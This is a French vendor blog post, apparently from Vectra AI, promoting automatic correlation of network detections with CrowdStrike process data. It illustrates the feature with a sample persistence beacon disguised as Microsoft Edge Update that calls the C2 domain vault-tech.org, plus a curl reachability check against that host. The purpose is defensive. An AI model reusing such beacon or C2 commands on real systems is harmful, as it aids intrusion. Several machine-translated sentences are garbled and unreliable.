Automatisez la maîtrise des attaques hybrides avec 360 Response

Automatisez la maîtrise des attaques hybrides avec 360 Response >

Vectra AI(NDR) のマジック・クアドラントにおいてリーダーの1社に
Icône de hamburger en haut de page
Icône de hamburger ligne médiane
Icône de hamburger ligne inférieure
La plateforme Vectra AI : cybersécurité de nouvelle génération

Comment Vectra AI automatiquement les détections réseau aux Endpoint

11 décembre 2025
Dale O'Grady
Ingénieur principal en intelligence compétitive
Comment Vectra AI automatiquement les détections réseau aux Endpoint

Cessez de chercher le « quoi » — voyez-le instantanément

Lorsque des activités suspectes apparaissent, la première question que se pose tout analyste est : « Quelle en est la cause ? »

Sans réponse, les enquêtes sont au point mort. Les analystes passent d'une console à l'autre, recherchent endpoint , corréler les horodatages et reconstituent manuellement le contexte. Les minutes se transforment en heures. Pendant ce temps, les attaquants se déplacent latéralement, exfiltrent des données ou établissent leur persistance.

C'est là que réside l'écart entre la détection réseau et endpoint , et c'est là que les menaces prennent l'avantage.

Le chaînon manquant entre le réseau et Endpoint

détection et réponse aux incidents NDR) excelle dans la détection des comportements suspects : commande et contrôle, reconnaissance, mouvement latéral, exfiltration de données. Mais la télémétrie réseau seule ne permet pas de déterminer quel processus sur le endpoint ce comportement.

S'agissait-il d'une session de navigation légitime ? D'un script PowerShell ? D'un malware caché ?

Endpoint et la réponse Endpoint (EDR) capturent ces détails au niveau des processus, mais sans corrélation avec l'activité réseau, les analystes doivent combler manuellement cette lacune, en recherchant dans CrowdStrike les processus exécutés à peu près au même moment, dans l'espoir d'identifier le coupable.

Cette corrélation manuelle est lente, source d'erreurs et non viable à grande échelle.

Présentation de la corrélation automatique des processus EDR

La toute dernière fonctionnalité Vectra AI, EDR Process Correlation, élimine complètement cette friction dans les enquêtes et enrichit la contextualisation.

Voici comment cela fonctionne :

Lorsque Vectra AI un comportement réseau suspect, il interroge automatiquement la télémétrie CrowdStrike pour cet hôte spécifique, analyse l'activité du processus et identifie le processus le plus susceptible d'avoir déclenché la détection.

Le résultat ? Des réponses instantanées et automatiques.

Les analystes voient le contexte complet du processus directement dans la Vectra AI :

Processus probable
MicrosoftEdgeUpdate.exe

Heure de création du processus
2025-11-29T03:58:42Z


de la ligne de commande « C:\ProgramData\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe » --connect vault-tech.org:443 --interval 300 --retry infinite

SHA256
c7e9a4b2f8d6c5e3a1f7d9b4c2e8a6f5d3b1c9e7a5f3d1b8c6e4a2f9d7b5c3e1

Chemin d'accès au fichier
\Device\HarddiskVolume2\ProgramData\Microsoft\EdgeUpdate\

Nom du compte
NT AUTHORITY\SYSTEM

Processus parent
services.exe (PID : 668)

En quelques secondes, l'analyste dispose de toutes les informations nécessaires : 

  • Ce qui a été exécuté : un mécanisme de persistance déguisé imitant le programme de mise à jour de Microsoft Edge.
  • Quand cela s'est produit : horodatage exact de la création du processus pour la corrélation de la chronologie
  • Ce qu'il a fait : la ligne de commande expose le domaine C2 (vault-tech.org), un intervalle de balise de 5 minutes et des tentatives de reconnexion infinies.
  • Emplacement : caché dans un chemin d'accès Microsoft d'apparence légitime
  • Qui l'a exécuté : compte SYSTEM - privilèges maximums pour la persistance et le déplacement latéral
  • Ce qui l'a généré : services.exe indique que ce malware s'malware comme service Windows.
  • Renseignements sur les menaces : hachage SHA256 prêt pour des vérifications immédiates de réputation et la corrélation des flux de menaces

À première vue, cela ressemble à un logiciel Microsoft ordinaire. Mais la ligne de commande révèle la vérité: il s'agit d'une balise C2 persistante dotée de privilèges SYSTÈME, qui se connecte toutes les 5 minutes, déguisée en programme de mise à jour légitime.

Cette ligne de commande seule convertit le « trafic réseau potentiellement suspect » en « menace persistante confirmée nécessitant une neutralisation immédiate ». C'est une mine d'or pour les enquêtes, fournie automatiquement.

De plus, un simple clic sur CrowdStrike permet aux analystes d'accéder directement à l'arborescence complète du processus et à la chronologie d'investigation lorsque des recherches plus approfondies sont nécessaires.

Pas de recherches manuelles. Pas de changement de console. Pas de conjectures.

Des heures aux secondes : un impact réel pour les équipes SOC

Avant la corrélation des processus EDR :

  1. Un analyste reçoit la détection Vectra AI
  1. Identifie l'hôte affecté
  1. Ouvre la console CrowdStrike
  1. Recherches de processus autour de la période de détection
  1. Correlate les horodatages du réseau avec l'activité des processus
  1. Valide quel processus est responsable
  1. Durée moyenne : 15 à 30 minutes par détection

Avec la corrélation des processus EDR :

  1. L'analyste reçoit Vectra AI avec le processus déjà identifié.
  1. Avis enrichis en ligne
  1. Cliquez directement sur CrowdStrike si une enquête plus approfondie est nécessaire.
  1. Durée moyenne : 30 à 60 secondes

Cela représente une réduction de 95 % du temps consacré aux enquêtes, et ce chiffre s'accumule à chaque détection, chaque jour.

Au-delà des processus individuels : de la détection à la recherche à l'échelle de l'entreprise

La corrélation des processus EDR ne se contente pas d'identifier le processus probable, elle fournit un workflow d'investigation complet, depuis le triage initial jusqu'à la recherche des menaces à l'échelle de l'entreprise.

Contexte immédiat : Afficher plus de processus

En cliquant sur « Afficher plus de processus », les analystes peuvent voir toutes les activités liées aux processus pendant la fenêtre de détection. Dans cet exemple, l'examen de la liste des processus révèle toute la progression de l'attaque :

  1. msedge.exe - Accès initial via phishing
  1. curl.exe - Reconnaissance : curl.exe -I https://vault-tech.org --connect-timeout 5
    L'attaquant vérifie l'accessibilité du C2 avant de s'engager dans la persistance - une requête HEAD avec un délai d'expiration de connexion indique une sécurité opérationnelle prudente.
  1. certutil.exe - Validation SSL pour vérifier l'infrastructure C2
    Plutôt que l'utilisation abusive typique pour les téléchargements de fichiers, certutil vérifie ici la chaîne de certificats du C2, garantissant que le tunnel crypté ne déclenchera pas d'avertissements SSL ou d'erreurs de confiance susceptibles d'alerter les utilisateurs ou les outils de sécurité.
  1. MicrosoftEdgeUpdate.exe - Tunnel C2 persistant avec balises toutes les 5 minutes
    Ce n'est qu'après avoir confirmé l'accessibilité de l'infrastructure et la validité du SSL que l'attaquant établit l'implant de balisage à intervalles de 5 minutes.

Enquête approfondie sur l'hôte : CrowdStrike Pivot en un clic

À partir de la même interface, Investigate Host dans CrowdStrike ouvre directement la chronologie complète de l'hôte dans Falcon. Les analystes peuvent instantanément étendre la période pour voir les processus avant ou après la fenêtre de détection, sans recherche manuelle d'hôte ni recherche AID, mais simplement en accédant immédiatement au contexte complet de l'hôte.

Cela est précieux pour comprendre l'ensemble du processus : y a-t-il eu une reconnaissance quelques jours auparavant ? L'attaquant est-il revenu avec des outils différents ? La chronologie est là, sous vos yeux.

Recherche à l'échelle de l'entreprise : requête préconfigurée sur les informations relatives aux menaces

La véritable puissance se révèle avec Run Query dans CrowdStrike, qui génère une requête Falcon NGSIEM sophistiquée préremplie avec tous les indicateurs pertinents :

  • Adresses IP distantes
  • Hachages SHA256
  • Modèles de ligne de commande
  • Caractéristiques d'exécution du processus
  • Détails de la connexion réseau

Il faudrait 10 à 15 minutes à un analyste très expérimenté pour construire manuellement cette requête. Vectra AI la Vectra AI instantanément, prête à être exécutée dans l'ensemble de votre environnement.

Exemple d'utilisation : la requête est limitée à cet hôte par défaut, mais avec une modification (suppression du filtre hôte), les analystes peuvent immédiatement rechercher :

  • Tout autre point de terminaison se connectant à vault-tech.org
  • Tout autre système exécutant le même hachage malveillant
  • Modèles de ligne de commande similaires indiquant des campagnes connexes

Cela transforme en quelques secondes une détection sur un seul hôte en informations sur les menaces à l'échelle de l'entreprise.

Cela s'avère particulièrement efficace lorsque le NDR détecte une activité que l'EDR n'a pas signalée. L'attaquant a réussi à se fondre dans le processus, mais son comportement sur le réseau l'a trahi. La corrélation des processus EDR comble instantanément cette lacune, en montrant non seulement ce qui s'est passé, mais aussi le déroulement complet de l'attaque.

Voir cet exemple en action :

Conçu pour les enquêtes dans le monde réel

Grâce à la corrélation intelligente des horodatages et à la mise en correspondance probabiliste des processus, Vectra AI Process Correlation gère automatiquement la complexité des terminaux modernes :

  • Environnements multiprocessus: identifie le bon processus même lorsque des dizaines d'entre eux s'exécutent simultanément.
  • Chaînes de processus enfants: permet de retracer l'activité à travers les relations parent-enfant.
  • Processus de courte durée: capture le contexte même pour les processus qui s'exécutent et se terminent rapidement.
  • Trafic chiffré: établit une corrélation entre le comportement du réseau et les processus, même lorsque l'inspection de la charge utile n'est pas possible.

Cette intelligence permet de prendre des décisions plus rapides et plus sûres tout au long de votre processus de sécurité.

Visibilité complète, réponse unifiée

La corrélation des processus EDR fait partie de l'intégration complète Vectra AI avec CrowdStrike, offrant une visibilité complète sur les menaces :

  1. Contextualisation des actifs — Les terminaux gérés par CrowdStrike sont automatiquement identifiés dans Vectra AI le système d'exploitation, l'ID du capteur et les détails de la dernière observation.
  1. Corrélation des processus EDR — La télémétrie des processus est automatiquement corrélée aux détections réseau.
  1. Réponse automatisée — Vectra AI déclencher des actions de confinement de l'hôte via l'API de CrowdStrike.

Ensemble, ces capacités créent une défense unifiée qui permet de visualiser l'ensemble du scénario d'attaque, depuis l'exécution initiale du processus jusqu'à la propagation sur le réseau, sans intervention manuelle.

Pourquoi est-ce important aujourd'hui ?

Les pirates associent de plus en plus souvent endpoint à des mouvements sur le réseau afin d'échapper à la détection. Malware sur un endpoint restent endpoint à leur place : ils communiquent avec des serveurs C2, se déplacent latéralement et exfiltrent des données à travers le réseau.

Vos défenses doivent être tout aussi fluides.

En reliant automatiquement le contexte endpoint aux détections réseau, Vectra AI CrowdStrike exposent instantanément l'intégralité de la chaîne d'attaque. Les analystes bénéficient d'une visibilité complète sur tous les domaines dès la première alerte, sans pivotement, sans délai et sans angle mort.

Voir la corrélation des processus EDR en action

Découvrez comment Vectra AI identifie Vectra AI le processus à l'origine des détections réseau et permet une investigation en un clic dans CrowdStrike.

Prêt à accélérer vos enquêtes sur les menaces ?

Découvrez l'intégration Vectra AI avec CrowdStrike et comment la corrélation des processus EDR fournit un contexte instantané pour une réponse plus rapide et plus fiable.

[Découvrez l'intégration →]  

Foire aux questions